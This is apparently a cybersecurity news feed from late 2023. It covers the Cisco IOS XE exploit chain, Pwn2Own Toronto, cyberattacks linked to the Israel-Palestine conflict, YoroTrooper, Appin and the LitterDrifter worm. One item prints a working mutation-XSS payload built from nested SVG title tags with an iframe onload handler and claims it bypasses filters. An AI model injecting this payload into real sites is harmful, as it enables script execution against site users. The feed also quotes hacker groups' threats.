A backdoor is implanted on Cisco devices by exploiting a pair of zero-day flaws in IOS XE software that has been modified by the threat actor so as to escape visibility via previous fingerprinting methods.

The attacks entail fashioning CVE-2023-20198 (CVSS score: 10.0) and CVE-2023-20273 (CVSS score: 7.2) into an exploit chain that grants the threat actor the ability to gain access to the devices, create a privileged account, and ultimately deploy a Lua-based implant on the devices.

https://thehackernews.com/2023/10/backdoor-implant-on-hacked-cisco.html

● Hackers earn over $1 million for 58 zero-days at Pwn²Own Toronto.

https://youtu.be/E6bGDScaz78

https://www.zerodayinitiative.com/blog/2023/10/23/pwn2own-toronto-2023-the-schedule

https://www.youtube.com/live/Tm8-syB79FQ

https://www.bleepingcomputer.com/news/security/hackers-earn-over-1-million-for-58-zero-days-at-pwn2own-toronto/

Israel-Palestine Cyber-War update!

🇮🇷🇮🇱 The Iranian hacker group "Moses Staff" has released a video in which they demonstrated the hacking of surveillance cameras positioned above the Mossad headquarters and the 8200 Unit of Aman (Israeli electronic intelligence unit) headquarters.

The message from the Iranian hackers states: "We have been instructed to remain silent, but we are prepared and armed. We await orders from our leader."

Cyber-Attack amid Israel-Palestine Cyber-War: Iranian state sponsored (as per Israeli sources) threat actor has allegedly compromised a data center pertaining to Israel with over 30TB of Data being wiped off in the attack.

The video was shared by the threat actor with technical detail.

Furthermore, a message was shared alongside the video PoC;
Thenceforth,you will suffer irreparable damage,We will punish you...
Also we destroyed more than 30 TB of data from different servers



מעתה תסבלו נזקים בלתי הפיך
אנחנו נעניש אתכם
במתקפה זו הרסנו יותר מ-30 טרה בייט של נתונים משרתים שונים

● Reattaching video due to format issues (apparently).

Cyber-Attack apparently deciphered.

Kazakhstan-associated YoroTrooper disguises the origin of attacks as Azerbaijan.

https://blog.talosintelligence.com/attributing-yorotrooper/

Zero-Day: Universal MXSS.

Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.

<svg>
<title>
<title>
<image href="</title><iframe onload=alert(1)>">
</title>
</title>
</svg>

Anonymous (Hacktivist group) sends a message to the Israeli leader and government amid ongoing attack on children of Palestine.

Story; part of Israel-Palestine Cyber-War.

https://youtu.be/BGcHzs9LKQE

● Command and control methods with details.

An Indian hack-for-hire group targeted the United States, China, Myanmar, Pakistan, Kuwait, and other countries as part of a wide-ranging espionage, surveillance, and disruptive operation for over a decade.

The Appin Software Security (aka Appin Security Group), according to an in-depth analysis from SentinelOne, began as an educational startup offering offensive security training programs, while carrying out covert hacking operations since at least 2009.

https://thehackernews.com/2023/11/indian-hack-for-hire-group-targeted-us.html

https://thehackernews.com/2013/05/first-large-cyber-espionage-activity.html

Russian state hackers spread USB worm worldwide.

LitterDrifter worm has been traced back to Russia’s Federal Security Service.

Malware Spotlight – Into the Trash: Analyzing LitterDrifter

https://research.checkpoint.com/2023/malware-spotlight-into-the-trash-analyzing-litterdrifter/

https://www.independent.co.uk/tech/russian-state-hackers-spread-usb-worm-worldwide-b2451776.html

Shadowy hacking group targeting Israel shows outsized capabilities. Islarel Palestine conflict.

A sophisticated campaign that has targeted Israel for at least 8 years shows evidence of improving its capabilities.

https://cyberscoop.com/hacking-israel-wild-card/